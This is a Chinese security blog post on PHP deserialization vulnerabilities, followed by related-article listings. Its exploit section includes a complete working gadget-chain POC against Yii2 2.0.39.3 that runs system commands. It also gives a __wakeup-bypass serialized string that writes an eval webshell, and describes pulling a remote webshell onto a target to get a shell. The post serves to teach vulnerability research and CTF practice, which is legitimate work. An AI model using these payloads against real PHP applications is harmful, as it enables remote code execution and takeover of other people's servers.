反序列化利用工具_PHP反序列化利用

最新推荐文章于 2024-09-11 12:18:56 发布
最新推荐文章于 2024-09-11 12:18:56 发布
阅读量663 收藏 1
点赞数
文章标签: 反序列化利用工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39924779/article/details/113330709
版权
本文详细介绍了PHP的序列化与反序列化概念,以及如何利用PHP反序列化漏洞进行攻击。通过实例展示了如何构造恶意序列化字符串,利用魔术方法调用可利用方法,如在ThinkPHP和Yii2框架中的反序列化利用链。还提到了PHP特定版本中__wakeup方法的绕过技巧,以及相关参考文献。
摘要由CSDN通过智能技术生成

0X1 PHP序列化与反序列化

    php序列化是将一个对象转换成字符串,而反序列化则是将序列化的字符串重新转换成对象。序列化与反序列化的存在是为了让对象也能在数据中进行传递或者保存。例如统一登录使用序列化进行存储用户对象和传输用户对象等。

0X2 PHP反序列化漏洞利用

    php序列化的内容本身是不存在危险的,但是如果反序列化的内容能进行控制则存在漏洞风险。

    例1:利用序列化存储session和cookie

    假设通过cookie(为了直接展示通过get方式过去参数)内的session值进行用户权限判断:

b6c9f73eb57c39c79c8a4110590ea78c.png    构造exp:

414677ed7ecc46c83c11106baae6712a.png

    构造一个isAdmin属性是true的对象进行序列化,然后传入漏洞利用点,则造成越权。

1e9f3928440b198f0add688716d005c3.png

    这里举例中是由于cookie内的值是可控,造成构造序列化的字符串。当然这种直接修改对象属性利用的漏洞很少见,目前只遇到过一次,并且反序列化字符串也会有各种加密等。

    反序列化漏洞常利用方式是利用某些对象的方法,首先需要先介绍几种php对象魔术方法(内置方法,可直接调用):

__construct() //new对象时执行__wakeup() //使用unserialize时触发__sleep() //使用serialize时触发__destruct() //对象被销毁时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //用于从不可访问的属性读取数据__set() //用于将数据写入不可访问的属性__isset() //在不可访问的属性上调用isset()或empty()触发__unset() //在不可访问的属性上使用unset()时触发__toString() //把类当作字符串使用时触发__invoke() //当脚本尝试将对象调用为函数时触发

    因为反序列化只能控制对象内容而不能操作对象,所以只能利用魔术方法的触发来调用能造成危害的方法。

    例2:利用魔术方法调用可利用方法

    假设可利用源码如下:

edcb2ef3ea5f6fa9667055f705091b99.png

    这里可利用方法是userImage,可以在控制url和imageName参数时getshell。unserialize() 执行时会检查是否存在一个wakeup() 方法。如果存在,则会先调用 wakeup 方法,预先准备对象需要的资源。

    因此在进行反序列化时就会调用userImage方法,只需要控制类的属性url和imageName即可getshell。exp:

2825b6609b04f650efbd464265dade2d.png

    把远程$url换成webshell内容,图片名称换成能解析的后缀,则会在当前目录将远程的文件写入到本地,达到getshell目的。

4a74649cb98cc34ef8aff95db1e795c4.png

    这里提供两个常见反序列化利用方法,在一些成熟的php框架中,如果找到二次开发使用到了反序列化这个利用点则需要找到对应框架的反序列化利用链来进行利用,其主要目的是构造exp。

    可以通过分析ThinkPHP/5.0.24反序列化利用链进行理解(https://xz.aliyun.com/t/7082)。   

    例3:Yii2(2.0.39.3)最新版本可用反序列化链分析

    先展示调试显示的利用链:

157be74c3727aba3e8cd0253fadc3a5c.png

    从利用链先分析:

    /vendor/yiisoft/yii2/rest/CreateAction.php

public function __destruct(){    $this->stopProcess();}public function stopProcess(){    foreach (array_reverse($this->processes) as $process) {        /** @var $process Process  **/        if (!$process->isRunning()) {            continue;        }        $this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());        $process->stop();    }    $this->processes = [];}

    当RunProcess对象销毁时会执行stopProcess方法,其中$this->processes是私有属不能直接赋值,但是能通过__construct进行赋值达到可控。之后会执行到$process->isRunning()当isRunning方法不存在时则会触发process 的__call方法所以process能当利用链的跳板,其中isRunning会向__call传入两个参数并且第一个参数等于”isRunning”第二个为空。如:

<?php class Name{    public function  __call($a,$b){        var_dump($a);    }}$a = new Name();$a->isRunning();

38d9a04af2f1783fdd44ea5c7f355d22.png

    然后分析:

    /vendor/fakerphp/faker/src/Faker/Generator.php

public function __call($method, $attributes){    return $this->format($method, $attributes);}public function format($formatter, $arguments = []){    return call_user_func_array($this->getFormatter($formatter), $arguments);}public function getFormatter($formatter){    if (isset($this->formatters[$formatter])) {        return $this->formatters[$formatter];    }    foreach ($this->providers as $provider) {        if (method_exists($provider, $formatter)) {            $this->formatters[$formatter] = [$provider, $formatter];            return $this->formatters[$formatter];        }    }    throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));}

    这里提取了主要代码,__call中执行formart方法$formatter=”isRunning”。调用getFormatter方法。在if语句中formatters数组存在[‘isRunning’]则直接返回素组的值进入到call_user_func_array函数,可构造array[0]为类array[1]为方法直接执行。

    下面分析可利用类:

    /vendor/yiisoft/yii2/rest/CreateAction.php

class CreateAction extends Action{public function run(){    if ($this->checkAccess) {        call_user_func($this->checkAccess, $this->id);    }}

    这里定义好checkAccess为执行方法,id为执行参数即可,最终POC:

<?php namespace yii\rest{    class CreateAction{        public $checkAccess='system';        public $id='whoami';    }}namespace Faker{    use yii\rest\CreateAction;    class Generator{        protected $formatters;        public function __construct(){            $this->formatters['isRunning'] = [new CreateAction(),'run'];        }    }}namespace Codeception\Extension{    use Faker\Generator;    class RunProcess{        private $processes;        public function __construct(){            $this->processes = [new Generator()];        }    }}namespace{    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));}?>

bc8cb3624ba8459b9f2f017851c78c99.png

    版本号:

94426142a64d3186acfd9e8b5d0828b9.png

    特殊问题:

    在PHP5 < 5.6.25和PHP7 < 7.0.10版本中,序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。这个关于__wakeup的绕过能更简单的构造exp,这个问题还经常在ctf中被运用。例如以下代码:

2d1a3e572648c17d629a2aa3a7919b0f.png

    __wakeup每次都会先将$a进行清零操作,如果绕过__wakeup则可以给$a赋值达到写入文件内容。

    Exp:

O:1:"A":2:{s:1:"a";s:27:"<?php eval($_POST["x"]);?>";}

    这个序列化字符串解释:O代表结构类型为:类,1表示类名长度,接着是类名、属性或成员个数(漏洞利用点)。

    大括号内分别是:属性名类型、长度、名称;值类型、长度、值。

0X3 参考文献:

https://xz.aliyun.com/t/7082https://bugs.php.net/bug.php?id=72663 https://www.anquanke.com/post/id/187393
weixin_39924779
关注
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
php 反序列化工具
wmnmtm的专栏
03-05 550
调试代码,经常需要打印变量,今天写了一个简单的反序列化页面,存下来用的时候方便。&lt;html&gt;&lt;header&gt;&lt;title&gt;反序列化工具&lt;/title&gt;&lt;style&gt;td{line-height:30px;}&lt;/style&gt;&lt;/header&gt;&lt;body&gt;&lt;form name=
CTF-php反序列化 (中)
最新发布
2301_81556781的博客
09-11 864
/结果为: O:1:"A":2:{s:2:"v1";s:3:"123";//结果: O:1:"A":2:{s:2:"v1";//结果为 O:1:"A":2:{s:2:"v1";s:2:"pwd";//结果为 O:1:"A":2:{s:2:"v1";//str_replace把"ls"替换为"pwd"
php反序列化
weixin_48900801的博客
05-08 951
序列化就是将数据转化成一种可逆的字符串,字符串还原原来结构的过程叫做反序列化序列化后,方便保存和传输(保留成员变量,不保留函数方法)数据(对象)-----序列化----- > 字符串-----反序列化----- > 数据(对象)
php 反序列化工具 phpggc 简介
whatday的专栏
08-30 4945
背景:   PHPGGC是一款能够自动生成主流框架的序列化测试payload的工具,可以说是反序列化的武器库,平时遇到有关反序列化的题目时如果能够熟练运用它,将节省大量功夫,之前只知道有这个工具但是并没有好好研究研究它,于是便有了此文,若是哪里说的不对,还请师傅们指出。 1.PHPGGC工具介绍:   项目地址:https://github.com/ambionics/phpggc   运行phpggc 的条件是php cli的版本>=5.6   通过./phpggc -l 可以列出所有可利用
反序列化利用工具_记一次Spring Devtools反序列化利用
weixin_31052141的博客
01-27 323
0x01 背景最近接触到一道与Java反序列化利用相关的CTF题目,由于之间接触Java反序列化比较少,并且这道题的反序列化利用中涉及到几个比较有意思的地方,例如URLConnection对访问协议处理的特性、Devtools中存在的反序列化面等,因此将解题过程记录分享。0x02 SSRF到任意文件读题目提供了一个Jar包用于分析,用IDEA打开Jar包后发现是一个逻辑很简单的Sprin...
028-精通PHP序列化与反序列化之_道_.pdf
09-20
总结起来,PHP序列化与反序列化是实现数据持久化、传输对象状态的强大工具,但同时也带来了安全风险。开发者需要理解它们的工作原理,合理使用,同时注意安全实践,避免出现安全漏洞。通过本文的学习,希望能帮助...
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-反序列化PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
详解php反序列化
12-17
PHP反序列化是一种将之前通过序列化保存的字符串还原成原始数据结构的技术。在PHP中,`serialize()`函数用于将变量转化为可存储或传输的字符串形式,而`unserialize()`函数则相反,它将字符串还原为原来的变量。这两...
反序列化利用工具_Shiro反序列化漏洞利用汇总
weixin_42628280的博客
01-25 4061
“ Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。”文章目录:1、Shiro rememberMe反序列化漏洞(Shiro-550)1.1 漏洞原理1.2 影响版本1.3 漏洞特征1.4 漏洞利用1.4.1 利用方式一:反弹shell1.4.2 利用方式二:写入文件2、Shiro Pa...
Java反序列化漏洞利用工具(WebLogic&Jboss)
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
反序列化利用工具_Fastjson反序列化漏洞的检测和利用
weixin_30758169的博客
01-27 4813
Fastjson是Alibaba开发的,Java语言编写的高性能Json库,号称Java语言中最快的Json库。针对Fastjson反序列化漏洞原理分析和Poc网上以及有很多,本文仅分享如何快速发现Fastjson反序列化漏洞,方便安全测试人员开展安全测试及修补漏洞。文章中涉及到的工具和源码仅供安全测试和学习使用,否则后果自负,与作者无关。0x01反序列化原理Fastjson反序列化,...
反序列化漏洞+ThinkPHP工具使用+shiro例工具使用
NSQ0207的博客
08-03 683
在url栏上输入O:4:"Flag":1:{s:4:"file";protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。private属性被序列化后属性名会变成%00类名%00属性名。O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示。这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面。s:4:"name" 字符串 属性值长度 属性值。运行11.php文件,获得序列化后的值。在vulhub文件内找到shiro漏洞。
PHP多种序列化/反序列化的方法
wml
05-27 2787
1. serialize和unserialize函数serialize() 函数,把复杂的数据类型压缩到一个字符串中,把变量和它们的值编码成文本形式,这有利于存储或传递 PHP 的值,同时不丢失其类型和结构 unserialize() 函数对单一的已序列化的变量进行操作,将其转换回 PHP 的值 例:$stooges = array('Moe','Larry','Curly'); $new =
长亭php反序列化防护_PHP反序列化笔记
06-01
工具使用了一些技巧,例如对反序列化对象进行检查、限制反序列化的深度和长度、限制反序列化的类和属性等等。 此外,为了更好地理解PHP反序列化和如何防护它,以下是一些笔记: 1. PHP的序列化和反序列化函数是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值